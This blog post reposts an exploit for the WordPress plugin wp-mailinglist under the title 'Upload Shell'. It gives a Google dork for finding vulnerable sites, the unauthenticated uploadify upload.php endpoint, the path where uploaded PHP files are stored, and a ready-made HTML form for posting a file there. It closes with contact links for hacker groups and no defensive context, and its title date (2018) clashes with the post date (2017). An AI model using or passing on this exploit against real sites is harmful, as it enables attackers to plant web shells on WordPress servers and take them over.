Monday, October 2, 2017
Home
Unlabelled
EXPLOIT WORDPRESS UPLOAD SHELL 2018
EXPLOIT WORDPRESS UPLOAD SHELL 2018
#################################################################################
# Exploit Title : Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF
# Author : Fadi Tnx
# Google Dork : inurl:/wp-content/plugins/wp-mailinglist/
# Tested on : Linux
# data : 2017-09-21
# Blog : http://www.03day.ga
#################################################################################
#
#
# if msg : No file data was posted An existing vulnerability
#
# [!] Exploit : 127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
#
# [!] File Location : http:/127.0.0.1/path/wp-content/uploads/wp-mailinglist/FILE_NAME.php
#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form action="127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
#################################################################################
# ABOUT
# Facebook : https://www.facebook.com/Fallagahacker.Tn/
# forum : http://spyhackerz.com/forum/
# Blog : http://www.03day.ga/
#################################################################################
Subscribe to:
Post Comments (Atom)
Post Top Ad
Author Details
a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.
No comments:
Post a Comment